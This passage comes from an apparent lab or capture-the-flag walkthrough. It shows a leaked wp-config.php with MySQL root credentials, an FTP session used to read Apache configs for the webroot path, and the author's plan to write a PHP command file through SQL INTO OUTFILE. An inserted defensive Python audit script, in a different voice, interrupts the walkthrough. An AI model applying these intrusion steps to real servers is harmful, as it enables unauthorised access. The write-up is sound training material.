<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * Codex page. You can get the MySQL settings from your web host.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * This file is used by the wp-config.php creation script during the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * installation. You don't have to use the web site, you can just copy this file</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * to "wp-config.php" and fill in the values.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * @package WordPress</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">// ** MySQL settings - You can get this info from your web host ** //</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/** The name of the database for WordPress */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('DB_NAME', 'wordpress');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>/** MySQL database username */</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>define('DB_USER', 'root');</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>/** MySQL database password */</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>define('DB_PASSWORD', 'plbkac');</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/** MySQL hostname */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('DB_HOST', 'localhost');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/** Database Charset to use in creating database tables. */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('DB_CHARSET', 'utf8mb4');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/** The Database Collate type. Don't change this if in doubt. */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('DB_COLLATE', '');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/**#@+</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * Authentication Unique Keys and Salts.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * Change these to different unique phrases!</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * @since 2.6.0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('AUTH_KEY', 'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('SECURE_AUTH_KEY', 'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('LOGGED_IN_KEY', 'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('NONCE_KEY', 'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('AUTH_SALT', 'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('LOGGED_IN_SALT', '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('NONCE_SALT', 'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/**#@-*/</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/**</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * WordPress Database Table prefix.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * You can have multiple installations in one database if you give each a unique</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * prefix. Only numbers, letters, and underscores please!</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$table_prefix = 'wp_';</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/**</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * For developers: WordPress debugging mode.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * Change this to true to enable the display of notices during development.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * It is strongly recommended that plugin and theme developers use WP_DEBUG</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * in their development environments.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('WP_DEBUG', false);</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/* That's all, stop editing! Happy blogging. */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/** Absolute path to the WordPress directory. */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">if ( !defined('ABSPATH') )</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>define('ABSPATH', dirname(__FILE__) . '/');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/** Sets up WordPress vars and included files. */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">require_once(ABSPATH . 'wp-settings.php');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('WP_HTTP_BLOCK_EXTERNAL', true);</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# </span><br />
<br />
Great!!! This file has the MySQL user details, which can be used to log in to the phpMyAdmin instance found in the nikto result.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-wrQ6Ux10boc/V1pFeDv_G9I/AAAAAAAABhU/eSkP3mlErSQD3eC_GP_OAkUNCq9WMv2lwCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-57-50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="486" src="https://1.bp.blogspot.com/-wrQ6Ux10boc/V1pFeDv_G9I/AAAAAAAABhU/eSkP3mlErSQD3eC_GP_OAkUNCq9WMv2lwCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-57-50.png" width="640" /></a></div>
<br />
With this I can run SQL queries using INTO OUTFILE to write a PHP file into the webroot and run commands. However, I don't know the path of the webroot.<br />
<br />
In Solution 1, I managed to access the FTP server with elly's account, whose home is basically the content of the /etc directory. I can look for the Apache conf files, which will contain the webroot path.<br />
<br />
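A defender's check for exactly what this step relies on, added here as an example (it is not part of the write-up, nor WordPress or Apache code): parse the define() lines of a wp-config.php and the DocumentRoot of each VirtualHost, and flag the settings that make the INTO OUTFILE route possible. Sample inputs are constructed, and the function names are my own.

```python
import re

# Constructed sample inputs: same shape as the files shown in the write-up,
# with placeholder values instead of the box's real secrets.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'example-password');
define('DB_HOST', 'localhost');
define('DB_COLLATE', '');
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'x7$Q!k)2');
$table_prefix = 'wp_';
define('WP_DEBUG', false);
"""

SAMPLE_VHOST = """<IfModule mod_ssl.c>
\t<VirtualHost _default_:12380>
\tServerAdmin garry@red
\tDocumentRoot /var/www/https
\tSSLEngine on
\t</VirtualHost>
</IfModule>
<VirtualHost *:80>
\t#DocumentRoot /var/www/old
\tDocumentRoot /var/www/html
</VirtualHost>
"""

# define('NAME', 'string');  or  define('NAME', true|false);
DEFINE_RE = re.compile(
    r"define\(\s*'([A-Za-z_]+)'\s*,\s*(?:'([^']*)'|(true|false))\s*\)\s*;", re.I
)
VHOST_RE = re.compile(r"<VirtualHost\s+([^>]+)>(.*?)</VirtualHost>", re.S | re.I)
# Only an uncommented DocumentRoot counts; '#DocumentRoot' fails the ^\s* anchor.
DOCROOT_RE = re.compile(r'^\s*DocumentRoot\s+"?([^"\s]+)', re.M | re.I)

# The WordPress default that ships in wp-config-sample.php.
PLACEHOLDER_SECRET = "put your unique phrase here"
SECRET_NAMES = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
                "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")


def wp_defines(text):
    """Return the define()d constants of a wp-config.php as a dict (bools for true/false)."""
    out = {}
    for name, string_val, bool_val in DEFINE_RE.findall(text):
        out[name] = string_val if bool_val == "" else (bool_val.lower() == "true")
    return out


def audit_wp_config(text):
    """List the weak wp-config.php settings; DB_USER=root is reported first."""
    d = wp_defines(text)
    findings = []
    if d.get("DB_USER") == "root":
        findings.append("DB_USER is 'root': the site's DB account holds every MySQL privilege, "
                        "including FILE, so a leaked password allows SELECT ... INTO OUTFILE.")
    if d.get("WP_DEBUG") is True:
        findings.append("WP_DEBUG is enabled: PHP notices (paths, queries) are shown to visitors.")
    for name in SECRET_NAMES:
        val = str(d.get(name, ""))
        if val == PLACEHOLDER_SECRET or len(val) < 64:
            findings.append(f"{name} is unset, the WordPress placeholder, or shorter than the 64 "
                            "characters the secret-key service issues: auth cookies are weak.")
    return findings


def document_roots(text):
    """Map each VirtualHost address (e.g. '_default_:12380') to its DocumentRoot."""
    roots = {}
    for addr, body in VHOST_RE.findall(text):
        m = DOCROOT_RE.search(body)
        if m:
            roots[addr.strip()] = m.group(1)
    return roots


def webroots_at_risk(wp_text, vhost_text):
    """Webroots a FILE-privileged DB account on the same host could write into.

    These are the directories where secure_file_priv and filesystem permissions
    must stop mysqld from creating files; an empty list means the DB account or
    host does not give that reach in the first place.
    """
    d = wp_defines(wp_text)
    host = d.get("DB_HOST", "localhost").split(":")[0]
    same_host = host in ("localhost", "127.0.0.1")
    if d.get("DB_USER") == "root" and same_host:
        return sorted(set(document_roots(vhost_text).values()))
    return []


if __name__ == "__main__":
    for f in audit_wp_config(SAMPLE_WP_CONFIG):
        print("-", f)
    for addr, root in document_roots(SAMPLE_VHOST).items():
        print(f"{addr:18} DocumentRoot {root}")
    print("verify mysqld cannot write into:", webroots_at_risk(SAMPLE_WP_CONFIG, SAMPLE_VHOST))
```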
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# ftp 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Connected to 192.168.1.3.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-|-----------------------------------------------------------------------------------------|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-| Harry, make sure to update the banner when you get a chance to show who has access here |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-|-----------------------------------------------------------------------------------------|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Name (192.168.1.3:root): elly</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">331 Please specify the password.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Password:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">230 Login successful.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Remote system type is UNIX.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Using binary mode to transfer files.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> cd apache2</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">250 Directory successfully changed.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> ls</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">200 PORT command successful. Consider using PASV.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">150 Here comes the directory listing.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 7114 Jun 03 16:37 apache2.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 04 00:02 conf-available</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 04 00:02 conf-enabled</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 1782 Mar 19 10:48 envvars</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 31063 Mar 19 10:48 magic</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 12288 Jun 03 23:52 mods-available</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 23:53 mods-enabled</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 327 Jun 03 16:26 ports.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 05 17:36 sites-available</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 04 19:57 sites-enabled</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">226 Directory send OK.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> cd sites-enabled</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">250 Directory successfully changed.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> ls</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">200 PORT command successful. Consider using PASV.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">150 Here comes the directory listing.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lrwxrwxrwx 1 0 0 35 Jun 03 16:22 000-default.conf -> ../sites-available/default-ssl.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">226 Directory send OK.</span><br />
<br />
Here is the content of the 'default-ssl.conf' file:<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# cat default-ssl.conf </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><IfModule mod_ssl.c></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span><VirtualHost _default_:12380></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>ServerAdmin garry@red</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>DocumentRoot /var/www/https</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Available loglevels: trace8, ..., trace1, debug, info, notice, warn,</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># error, crit, alert, emerg.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># It is also possible to configure the loglevel for particular</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># modules, e.g.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#LogLevel info ssl:warn</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>ErrorLog ${APACHE_LOG_DIR}/error.log</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>CustomLog ${APACHE_LOG_DIR}/access.log combined</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># For most configuration files from conf-available/, which are</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># enabled or disabled at a global level, it is possible to</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># include a line for only one particular virtual host. For example the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># following line enables the CGI configuration for this host only</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># after it has been globally disabled with "a2disconf".</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#Include conf-available/serve-cgi-bin.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># SSL Engine Switch:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Enable/Disable SSL for this virtual host.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>SSLEngine on</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># A self-signed (snakeoil) certificate can be created by installing</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># the ssl-cert package. See</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># /usr/share/doc/apache2/README.Debian.gz for more info.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># If both key and certificate are stored in the same file, only the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># SSLCertificateFile directive is needed.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>SSLCertificateFile<span class="Apple-tab-span" style="white-space: pre;"> </span>/etc/ssl/certs/red.crt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>SSLCertificateKeyFile /etc/ssl/certs/red.key</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Server Certificate Chain:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Point SSLCertificateChainFile at a file containing the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># concatenation of PEM encoded CA certificates which form the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># certificate chain for the server certificate. Alternatively</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># the referenced file can be the same as SSLCertificateFile</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># when the CA certificates are directly appended to the server</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># certificate for convinience.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLCertificateChainFile /etc/apache2/ssl.crt/server-ca.crt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Certificate Authority (CA):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Set the CA certificate verification path where to find CA</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># certificates for client authentication or alternatively one</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># huge file containing all of them (file must be PEM encoded)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Note: Inside SSLCACertificatePath you need hash symlinks</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> to point to the certificate files. Use the provided</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> Makefile to update the hash symlinks after changes.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLCACertificatePath /etc/ssl/certs/</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLCACertificateFile /etc/apache2/ssl.crt/ca-bundle.crt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Certificate Revocation Lists (CRL):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Set the CA revocation path where to find CA CRLs for client</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># authentication or alternatively one huge file containing all</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># of them (file must be PEM encoded)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Note: Inside SSLCARevocationPath you need hash symlinks</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> to point to the certificate files. Use the provided</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> Makefile to update the hash symlinks after changes.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLCARevocationPath /etc/apache2/ssl.crl/</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLCARevocationFile /etc/apache2/ssl.crl/ca-bundle.crl</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Client Authentication (Type):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Client certificate verification type and depth. Types are</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># none, optional, require and optional_no_ca. Depth is a</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># number which specifies how deeply to verify the certificate</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># issuer chain before deciding the certificate is not valid.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLVerifyClient require</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLVerifyDepth 10</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># SSL Engine Options:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Set various options for the SSL engine.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># o FakeBasicAuth:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> Translate the client X.509 into a Basic Authorisation. This means that</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> the standard Auth/DBMAuth methods can be used for access control. The</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> user name is the `one line' version of the client's X.509 certificate.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> Note that no password is obtained from the user. Every entry in the user</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> file needs this password: `xxj31ZMTZzkVA'.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># o ExportCertData:</span><br />
